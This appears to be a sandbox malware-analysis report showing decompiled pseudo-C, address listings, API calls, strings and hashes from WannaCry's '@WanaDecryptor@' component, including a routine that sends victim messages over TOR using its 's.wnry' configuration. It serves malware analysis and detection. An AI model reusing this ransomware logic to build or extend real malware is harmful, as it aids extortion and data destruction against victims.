							L00412CC2();
							_v36 = 8;
							L00412CC2();
							_v36 = 0xffffffff;
							L00412CC2();
							goto L33;
						}
						_push( *(_t208 + 0x74));
						_push( &_v36);
						L00412E1E();
						_v12 = 5;
						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
						_push(_t109);
						_push( &_v36);
						L00412E24();
						_push(_t109);
						_t110 =  &_v52;
						_push(_t110);
						_push( &_v40);
						_v20 = 6;
						L00412E18();
						_push(_t110);
						_v32 = 7;
						L00412D9A();
						_v36 = 6;
						L00412CC2();
						_v36 = 5;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
						goto L33;
					}
					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
					_t113 =  *(__ecx + 0x74) * _t182;
					__eflags = _t163 - _t113;
					if(_t163 >= _t113) {
						goto L15;
					}
					_t114 = _t113 - _t163;
					__eflags = _t114;
					if(_t114 <= 0) {
						goto L15;
					}
					_t130 = _t114;
					do {
						_push( *((intOrPtr*)(__ecx + 0x40)));
						L00412E36();
						_t130 = _t130 - 1;
						__eflags = _t130;
					} while (_t130 != 0);
					goto L15;
				}
				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
					L6:
					_t205 = _t208 + 0x44;
					if( *(_t208 + 0x78) != 0) {
						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
						_push(_t117);
						_push( &_v36);
						L00412E24();
						_t118 =  &_v36;
						_push(1);
						_push(_t118);
						_v12 = 2;
						L00412E1E();
						_push(_t117);
						_push(_t118);
						_push( &_v40);
						_v20 = 3;
						L00412E18();
						_push(_t118);
						_v32 = 4;
						L00412D9A();
						_v36 = 3;
						L00412CC2();
						_v36 = 2;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
					} else {
						_push(1);
						_push( &_v24);
						_t119 =  *((intOrPtr*)( *_t205));
						_v36 = _t119;
						L00412E30();
						_v12 = 0;
						_push(_v44);
						_push(_t119);
						_t120 =  &_v36;
						_push(_t120);
						L00412E2A();
						_push(_t120);
						_v24 = 1;
						L00412D9A();
						_v28 = 0;
						L00412CC2();
						_v28 = 0xffffffff;
						L00412CC2();
					}
					goto L33;
				}
				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
				_t122 =  *(__ecx + 0x74);
				if(_t179 >= _t122) {
					goto L6;
				}
				_t123 = _t122 - _t179;
				if(_t123 <= 0) {
					goto L6;
				}
				_t132 = _t123;
				do {
					_push( *((intOrPtr*)(__ecx + 0x40)));
					L00412E36();
					_t132 = _t132 - 1;
				} while (_t132 != 0);
				goto L6;
			}

















































                                  0x00405236
                                  0x00405238
                                  0x0040523d
                                  0x0040523e
                                  0x0040524b
                                  0x0040524e
                                  0x00405254
                                  0x00405369
                                  0x00405552
                                  0x0040555a
                                  0x00405560
                                  0x00405568
                                  0x00405572
                                  0x00405572
                                  0x0040536f
                                  0x00405373
                                  0x0040539e
                                  0x0040539e
                                  0x004053a1
                                  0x004053a4
                                  0x00405430
                                  0x00405433
                                  0x004054b4
                                  0x004054b6
                                  0x00405503
                                  0x00405506
                                  0x00000000
                                  0x00000000
                                  0x0040550b
                                  0x0040550e
                                  0x00405511
                                  0x00405516
                                  0x00405517
                                  0x00405519
                                  0x0040551b
                                  0x00000000
                                  0x00000000
                                  0x0040551d
                                  0x0040551f
                                  0x00000000
                                  0x00000000
                                  0x00405521
                                  0x00405523
                                  0x00405525
                                  0x00000000
                                  0x00000000
                                  0x00405527
                                  0x00405529
                                  0x00405534
                                  0x00405535
                                  0x00405536
                                  0x0040553e
                                  0x00405542
                                  0x00405545
                                  0x0040554a
                                  0x0040554d
                                  0x0040554f
                                  0x0040554f
                                  0x0040554f
                                  0x00000000
                                  0x00405529
                                  0x004054bb
                                  0x004054be
                                  0x004054c1
                                  0x004054c6
                                  0x004054c7
                                  0x004054c9
                                  0x004054cb
                                  0x004054d1
                                  0x004054d1
                                  0x004054d6
                                  0x004054d6
                                  0x004054d8
                                  0x004054da
                                  0x00000000
                                  0x00000000
                                  0x004054dc
                                  0x004054de
                                  0x004054e6
                                  0x004054e7
                                  0x004054ea
                                  0x004054ef
                                  0x004054f1
                                  0x004054f4
                                  0x004054f9
                                  0x004054fc
                                  0x004054fe
                                  0x004054fe
                                  0x004054fe
                                  0x00000000
                                  0x00405501
                                  0x004054cd
                                  0x004054cf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004054cf
                                  0x0040543b
                                  0x0040543f
                                  0x00405440
                                  0x00405443
                                  0x0040544f
                                  0x00405450
                                  0x00405453
                                  0x0040545b
                                  0x00405468
                                  0x0040546b
                                  0x0040546c
                                  0x0040546d
                                  0x00405471
                                  0x00405476
                                  0x00405479
                                  0x0040547e
                                  0x00405487
                                  0x0040548b
                                  0x00405494
                                  0x00405499
                                  0x004054a2
                                  0x004054aa
                                  0x00000000
                                  0x004054aa
                                  0x004053b4
                                  0x004053b5
                                  0x004053b8
                                  0x004053c3
                                  0x004053d1
                                  0x004053d5
                                  0x004053d6
                                  0x004053d7
                                  0x004053dc
                                  0x004053dd
                                  0x004053e7
                                  0x004053e8
                                  0x004053e9
                                  0x004053ed
                                  0x004053f2
                                  0x004053f5
                                  0x004053fa
                                  0x00405403
                                  0x00405407
                                  0x00405410
                                  0x00405415
                                  0x0040541e
                                  0x00405426
                                  0x00000000
                                  0x00405426
                                  0x0040537b
                                  0x00405381
                                  0x00405384
                                  0x00405386
                                  0x00000000
                                  0x00000000
                                  0x00405388
                                  0x0040538a
                                  0x0040538c
                                  0x00000000
                                  0x00000000
                                  0x0040538e
                                  0x00405390
                                  0x00405393
                                  0x00405396
                                  0x0040539b
                                  0x0040539b
                                  0x0040539b
                                  0x00000000
                                  0x00405390
                                  0x0040525d
                                  0x00405285
                                  0x00405288
                                  0x0040528d
                                  0x004052f9
                                  0x004052fa
                                  0x004052fb
                                  0x004052fc
                                  0x00405303
                                  0x00405307
                                  0x00405309
                                  0x0040530c
                                  0x00405314
                                  0x00405319
                                  0x00405320
                                  0x00405321
                                  0x00405322
                                  0x00405326
                                  0x0040532b
                                  0x0040532e
                                  0x00405333
                                  0x0040533c
                                  0x00405340
                                  0x00405349
                                  0x0040534e
                                  0x00405357
                                  0x0040535f
                                  0x0040528f
                                  0x00405295
                                  0x00405297
                                  0x00405298
                                  0x0040529c
                                  0x004052a0
                                  0x004052a9
                                  0x004052b1
                                  0x004052b2
                                  0x004052b3
                                  0x004052b7
                                  0x004052b8
                                  0x004052bd
                                  0x004052c0
                                  0x004052c5
                                  0x004052ce
                                  0x004052d3
                                  0x004052dc
                                  0x004052e4
                                  0x004052e4
                                  0x00000000
                                  0x0040528d
                                  0x00405265
                                  0x00405268
                                  0x0040526d
                                  0x00000000
                                  0x00000000
                                  0x0040526f
                                  0x00405273
                                  0x00000000
                                  0x00000000
                                  0x00405275
                                  0x00405277
                                  0x0040527a
                                  0x0040527d
                                  0x00405282
                                  0x00405282
                                  0x00000000

                                  APIs
                                  • #940.MFC42(?), ref: 0040527D
                                  • #4277.MFC42(?,00000001), ref: 004052A0
                                  • #923.MFC42(?,00000000,?), ref: 004052B8
                                  • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                  • #4129.MFC42(?,?), ref: 004052FC
                                  • #5710.MFC42 ref: 00405314
                                  • #922.MFC42(?,00000000,00000000), ref: 00405326
                                  • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                  • #940.MFC42(?), ref: 00405396
                                  • #5710.MFC42(?,?), ref: 004053B8
                                  • #4129.MFC42(?,?,?,?), ref: 004053D7
                                  • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                  • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                  • #4129.MFC42(?,?), ref: 00405443
                                  • #4277.MFC42(?,?,?,?), ref: 0040545B
                                  • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                  • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                  • #6778.MFC42(?,00000001), ref: 004054EA
                                  • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                  • #6778.MFC42(00000000,?), ref: 00405536
                                  • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                  • String ID:
                                  • API String ID: 2121400562-0
                                  • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                  • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004082C0 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 181fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 56%
                                  			E004082C0(void* __ecx) {
				void* __ebp;
				signed int _t44;
				void* _t45;
				void* _t47;
				signed int _t48;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				void* _t60;
				signed int _t65;
				signed int _t90;
				signed int _t91;
				signed int _t104;
				intOrPtr* _t106;
				struct _IO_FILE* _t107;
				signed int _t108;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				void* _t116;
				void* _t118;
				void* _t120;

				_push(0xffffffff);
				_push(E00413FCE);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t114;
				_t115 = _t114 - 0x8c;
				_t111 = __ecx;
				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
				if(_t44 > 0x3e8) {
					_push(0x3e8);
					_push(0);
					_push(_t115 + 0x14);
					L00412F6E();
					_push(_t44);
					 *((char*)(_t115 + 0xa8)) = 1;
					L00412D9A();
					 *((char*)(_t115 + 0xa4)) = 0;
					L00412CC2();
				}
				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
					_t106 = __imp__time;
					_t45 =  *_t106(0);
					_t90 =  *0x4218a8; // 0x0
					_t116 = _t115 + 4;
					__eflags = _t45 - _t90 - 0xb4;
					if(_t45 - _t90 >= 0xb4) {
						L13:
						_t47 =  *_t106(0);
						_t91 =  *0x4218a8; // 0x0
						_t116 = _t116 + 4;
						_t48 = _t47 - _t91;
						__eflags = _t48 - 0xe10;
						if(_t48 <= 0xe10) {
							L9:
							__eflags =  *0x4218ac - 3; // 0x0
							if(__eflags < 0) {
								L15:
								 *((intOrPtr*)(_t116 + 0x14)) = 0;
								memset(_t116 + 0x18, 0, 0x21 << 2);
								_t51 = fopen("00000000.res", "rb");
								_t107 = _t51;
								_t118 = _t116 + 0x14;
								__eflags = _t107;
								if(_t107 != 0) {
									fread(_t118 + 0x1c, 0x88, 1, _t107);
									fclose(_t107);
									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
									_push(0);
									_push( *((intOrPtr*)(_t118 + 0xcc)));
									_push(_t118 + 0x38);
									_push(_t111 + 0x5f0);
									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
									_t118 = _t118 + 0x30;
									_t108 = _t56;
									E0040C670();
									_t58 =  *(_t118 + 0xb0);
									__eflags = _t108;
									if(_t108 < 0) {
										__eflags = _t58;
										if(_t58 != 0) {
											_push(0);
											_push(0x30);
											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
											L00412CC8();
										}
									} else {
										__eflags = _t58;
										if(_t58 != 0) {
											L00412CC8();
											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
											_t118 = _t118 + 4;
											 *0x4218a8 = _t58;
										}
									}
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t108;
								} else {
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t51 | 0xffffffff;
								}
								L23:
								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
								return _t59;
							}
							__eflags =  *(_t116 + 0xb0);
							if( *(_t116 + 0xb0) != 0) {
								L00412DA6();
								 *((char*)(_t116 + 0xa8)) = 2;
								_t60 =  *_t106(0);
								_t104 =  *0x4218a8; // 0x0
								_t120 = _t116 + 4;
								__eflags = 0x3d;
								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
								_push("You are sending too many mails! Please try again %d minutes later.");
								_push(_t120 + 0x10);
								L00412E00();
								_t48 =  *(_t120 + 0x1c);
								_t116 = _t120 + 0xc;
								_push(0);
								_push(0);
								_push(_t48);
								L00412CC8();
								 *((char*)(_t116 + 0xa4)) = 0;
								L00412CC2();
							}
							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
							L00412CC2();
							_t59 = _t48 | 0xffffffff;
							goto L23;
						}
						 *0x4218ac = 0;
						goto L15;
					}
					_t65 =  *0x4218ac; // 0x0
					__eflags = _t65 - 3;
					if(_t65 >= 3) {
						goto L13;
					}
					_t48 = _t65 + 1;
					__eflags = _t48;
					 *0x4218ac = _t48;
					goto L9;
				}
				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
					_push(0);
					_push(0);
					_push("Too short message!");
					L00412CC8();
				}
				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
				L00412CC2();
				_t59 = _t44 | 0xffffffff;
				goto L23;
			}


























                                  0x004082c0
                                  0x004082c2
                                  0x004082cd
                                  0x004082ce
                                  0x004082d5
                                  0x004082df
                                  0x004082ea
                                  0x004082f1
                                  0x004082f9
                                  0x004082fb
                                  0x00408304
                                  0x00408305
                                  0x0040830d
                                  0x00408312
                                  0x0040831a
                                  0x00408322
                                  0x0040832b
                                  0x00408332
                                  0x00408332
                                  0x00408342
                                  0x00408378
                                  0x0040837f
                                  0x00408381
                                  0x00408387
                                  0x00408391
                                  0x00408396
                                  0x0040844d
                                  0x0040844e
                                  0x00408450
                                  0x00408456
                                  0x00408459
                                  0x0040845b
                                  0x00408460
                                  0x004083af
                                  0x004083af
                                  0x004083b5
                                  0x0040846c
                                  0x00408477
                                  0x00408485
                                  0x00408487
                                  0x0040848d
                                  0x0040848f
                                  0x00408492
                                  0x00408494
                                  0x004084c2
                                  0x004084c9
                                  0x004084e2
                                  0x004084ee
                                  0x004084f3
                                  0x004084fa
                                  0x004084fb
                                  0x004084fc
                                  0x00408501
                                  0x00408504
                                  0x00408506
                                  0x0040850b
                                  0x00408512
                                  0x00408514
                                  0x00408538
                                  0x0040853a
                                  0x0040853c
                                  0x0040853d
                                  0x0040853f
                                  0x00408544
                                  0x00408544
                                  0x00408516
                                  0x00408516
                                  0x00408518
                                  0x00408522
                                  0x00408528
                                  0x0040852e
                                  0x00408531
                                  0x00408531
                                  0x00408518
                                  0x00408550
                                  0x0040855b
                                  0x00408560
                                  0x00408496
                                  0x0040849d
                                  0x004084a8
                                  0x004084ad
                                  0x004084ad
                                  0x00408562
                                  0x0040856d
                                  0x0040857a
                                  0x0040857a
                                  0x004083bb
                                  0x004083c2
                                  0x004083c8
                                  0x004083ce
                                  0x004083d6
                                  0x004083d8
                                  0x004083f5
                                  0x004083fd
                                  0x00408403
                                  0x00408404
                                  0x00408409
                                  0x0040840a
                                  0x0040840f
                                  0x00408413
                                  0x00408416
                                  0x00408417
                                  0x00408418
                                  0x00408419
                                  0x00408422
                                  0x00408429
                                  0x00408429
                                  0x00408435
                                  0x00408440
                                  0x00408445
                                  0x00000000
                                  0x00408445
                                  0x00408466
                                  0x00000000
                                  0x00408466
                                  0x0040839c
                                  0x004083a1
                                  0x004083a3
                                  0x00000000
                                  0x00000000
                                  0x004083a9
                                  0x004083a9
                                  0x004083aa
                                  0x00000000
                                  0x004083aa
                                  0x0040834b
                                  0x0040834d
                                  0x0040834e
                                  0x0040834f
                                  0x00408354
                                  0x00408354
                                  0x00408360
                                  0x0040836b
                                  0x00408370
                                  0x00000000

                                  APIs
                                  • #4278.MFC42(000003E8,00000000,000003E8,?,?,75F15C80), ref: 0040830D
                                  • #858.MFC42 ref: 00408322
                                  • #800.MFC42 ref: 00408332
                                  • #1200.MFC42(Too short message!,00000000,00000000,?,?,75F15C80), ref: 00408354
                                  • #800.MFC42 ref: 0040836B
                                  • time.MSVCRT ref: 0040837F
                                  • #540.MFC42 ref: 004083C8
                                  • time.MSVCRT ref: 004083D6
                                  • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                  • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                  • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                  • #800.MFC42 ref: 00408440
                                  • time.MSVCRT ref: 0040844E
                                  • fopen.MSVCRT ref: 00408487
                                  • #800.MFC42 ref: 004084A8
                                  • fread.MSVCRT ref: 004084C2
                                  • fclose.MSVCRT ref: 004084C9
                                  • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                  • time.MSVCRT ref: 00408528
                                  • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                  • #800.MFC42 ref: 0040855B
                                  Strings
                                  • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                  • 00000000.res, xrefs: 00408480
                                  • Too short message!, xrefs: 0040834F
                                  • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                  • Your message has been sent successfully!, xrefs: 0040851D
                                  • s.wnry, xrefs: 004084DD
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                  • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                  • API String ID: 1233543560-382338106
                                  • Opcode ID: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                  • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                  • Opcode Fuzzy Hash: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                  • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004086E0 Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 324windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
				struct HBRUSH__* _v8;
				char _v16;
				char _v28;
				intOrPtr _v36;
				char _v52;
				char _v76;
				char _v88;
				intOrPtr _v120;
				intOrPtr _v124;
				struct HDC__* _v128;
				signed int _v132;
				void* _v136;
				char _v144;
				signed int _v148;
				struct HBRUSH__* _v152;
				intOrPtr _v156;
				struct HBRUSH__* _v160;
				char _v164;
				void* _v168;
				long _v172;
				char _v176;
				char _v180;
				struct tagRECT _v196;
				intOrPtr _v200;
				char* _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				struct HBRUSH__* _v232;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				struct HDC__* _v252;
				char _v256;
				struct HBRUSH__* _v260;
				struct HBRUSH__* _v264;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				struct HBRUSH__* _v284;
				struct HBRUSH__* _v288;
				char _v292;
				intOrPtr _v300;
				char _v324;
				signed int _t146;
				intOrPtr _t148;
				signed int _t150;
				void* _t152;
				intOrPtr _t155;
				char _t163;
				char* _t165;
				RECT* _t177;
				struct HBRUSH__* _t182;
				intOrPtr _t206;
				signed int _t276;
				intOrPtr _t277;
				intOrPtr* _t281;
				void* _t283;
				long _t284;
				intOrPtr _t286;
				intOrPtr _t291;
				signed long long _t299;
				signed long long _t301;
				signed long long _t303;

				_t299 = __fp0;
				_t283 = __ebp;
				_push(0xffffffff);
				_push(E00414055);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_t281 = __ecx;
				_push(__ecx);
				L00412DD0();
				_v8 = 0;
				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
				_push( &_v164);
				_push( &_v168);
				L00412FFE();
				L00412E54();
				_v16 = 1;
				E00407640( &_v240);
				_v240 = 0x41675c;
				_t206 = _v120;
				_t146 = 0 | _t206 == 0x00000000;
				_v16 = 2;
				_v256 = 0x4166e0;
				_v228 =  &_v132;
				_v232 = 0;
				_v208 = _t146;
				if(_t146 == 0) {
					_v244 = _t206;
					_v248 = _v124;
					_v252 = _v128;
				} else {
					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
					asm("sbb eax, eax");
					_push(CreateCompatibleDC( ~( &_v136) & _v132));
					L00412E4E();
					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
					_t35 =  &_v264; // 0x41675c
					_v260 = E00409F10( &_v280, _t35);
					_push(_v248);
					_push(_v252);
					_push( &_v76);
					L00412FF8();
				}
				_v16 = 3;
				_v204 =  &_v256;
				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
				_t291 = _t148;
				if(_t291 == 0) {
					_push( *((intOrPtr*)(_t281 + 0x58)));
					_push( &_v196);
					L00412FF2();
				} else {
					if(_t291 != 0) {
						_t182 =  *(_t148 + 4);
					} else {
						_t182 = 0;
					}
					FillRect(_v252,  &_v196, _t182);
				}
				_push(_t281 + 0x74);
				L00412FEC();
				_t150 = _v196.top;
				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
					_v268 = 0x4166e0;
					_v28 = 5;
					if(_v220 == 0) {
						_v260 = 0;
						_v264 = 0;
					} else {
						_t153 = _v232;
						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
						_t155 = _v276;
						if(_t155 != 0) {
							_push( *((intOrPtr*)(_t155 + 4)));
							_push(_v264);
							L00412E48();
						} else {
							_push(0);
							_push(_v264);
							L00412E48();
						}
					}
					_v28 = 4;
				} else {
					L00412FE6();
					_v212 = _t150;
					_t276 = _t150 & 0x00008000;
					_v148 = _t150 & 0x00002000;
					_v180 = 0;
					_v176 = 0;
					_v168 = 0;
					_v164 = 0;
					_v160 = 0;
					_v152 = 0;
					if((_t150 & 0x00000004) == 0) {
						_v156 = _v200 - _v208;
					} else {
						_v156 = _v196.left - _v204;
					}
					asm("fild dword [esp+0x80]");
					_push(_t283);
					_t284 = _v196.right.left;
					_t163 = _v196.top - _t284;
					_v272 = _v196.bottom - _t284;
					asm("fild dword [esp+0x10]");
					_v272 = _t163;
					asm("fild dword [esp+0x10]");
					_t301 = _t299 * st2 / st1;
					L0041304A();
					_v172 = _t163;
					if(_t276 == 0) {
						st0 = _t301;
						st0 = _t301;
					} else {
						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
						asm("fild dword [esp+0x10]");
						_t303 = _t301 * st2 / st1;
						L0041304A();
						st0 = _t303;
						st0 = _t303;
						_v180 = _t163;
					}
					_t277 =  *((intOrPtr*)(_t281 + 0x54));
					if(_t277 == 0) {
						_t165 =  &_v180;
						if(_v148 == 0) {
							_t165 =  &_v164;
						}
						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
					} else {
						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
						if(_t277 != 0) {
							FillRect(_v264, _t177,  *(_t277 + 4));
						} else {
							FillRect(_v264, _t177, 0);
						}
					}
					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
					_v292 = 0x4166e0;
					_v52 = 7;
					if(_v244 == 0) {
						_v284 = 0;
						_v288 = 0;
						_v52 = 6;
					} else {
						_t172 = _v256;
						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
						_t112 =  &_v324; // 0x4166e0
						E00409F10(_t112, _v300);
						_v88 = 6;
					}
				}
				_t133 =  &_v252; // 0x41675c
				_t152 = E00409E20(_t133);
				_v28 = 0;
				L00412E3C();
				_v28 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v36;
				return _t152;
			}








































































                                  0x004086e0
                                  0x004086e0
                                  0x004086e0
                                  0x004086e2
                                  0x004086ed
                                  0x004086ee
                                  0x004086fd
                                  0x00408700
                                  0x00408708
                                  0x00408718
                                  0x0040871f
                                  0x00408736
                                  0x00408742
                                  0x00408743
                                  0x00408746
                                  0x0040874f
                                  0x00408758
                                  0x00408760
                                  0x00408765
                                  0x0040876d
                                  0x0040877d
                                  0x00408789
                                  0x00408791
                                  0x00408795
                                  0x00408799
                                  0x0040879d
                                  0x004087a1
                                  0x0040883f
                                  0x0040884a
                                  0x0040884e
                                  0x004087a7
                                  0x004087ba
                                  0x004087cd
                                  0x004087d8
                                  0x004087dd
                                  0x00408804
                                  0x00408809
                                  0x0040881f
                                  0x00408823
                                  0x0040882b
                                  0x0040882c
                                  0x00408831
                                  0x00408831
                                  0x00408856
                                  0x0040885e
                                  0x00408862
                                  0x00408865
                                  0x00408867
                                  0x0040888c
                                  0x0040888d
                                  0x00408892
                                  0x00408869
                                  0x00408869
                                  0x0040886f
                                  0x0040886b
                                  0x0040886b
                                  0x0040886b
                                  0x0040887d
                                  0x0040887d
                                  0x0040889e
                                  0x0040889f
                                  0x004088a4
                                  0x004088ae
                                  0x00408a7d
                                  0x00408a85
                                  0x00408a8f
                                  0x00408ae5
                                  0x00408ae9
                                  0x00408a91
                                  0x00408a91
                                  0x00408ab9
                                  0x00408abe
                                  0x00408ac4
                                  0x00408ad8
                                  0x00408add
                                  0x00408ade
                                  0x00408ac6
                                  0x00408ac8
                                  0x00408acd
                                  0x00408ace
                                  0x00408ace
                                  0x00408ac4
                                  0x00408aed
                                  0x004088be
                                  0x004088c0
                                  0x004088c9
                                  0x004088d0
                                  0x004088dd
                                  0x004088e4
                                  0x004088e8
                                  0x004088ec
                                  0x004088f0
                                  0x004088f4
                                  0x004088f8
                                  0x004088ff
                                  0x0040891e
                                  0x00408901
                                  0x0040890b
                                  0x0040890b
                                  0x0040892d
                                  0x00408934
                                  0x00408935
                                  0x0040893b
                                  0x0040893d
                                  0x00408941
                                  0x00408945
                                  0x00408949
                                  0x0040894f
                                  0x00408951
                                  0x00408958
                                  0x0040895c
                                  0x0040897e
                                  0x00408980
                                  0x0040895e
                                  0x00408963
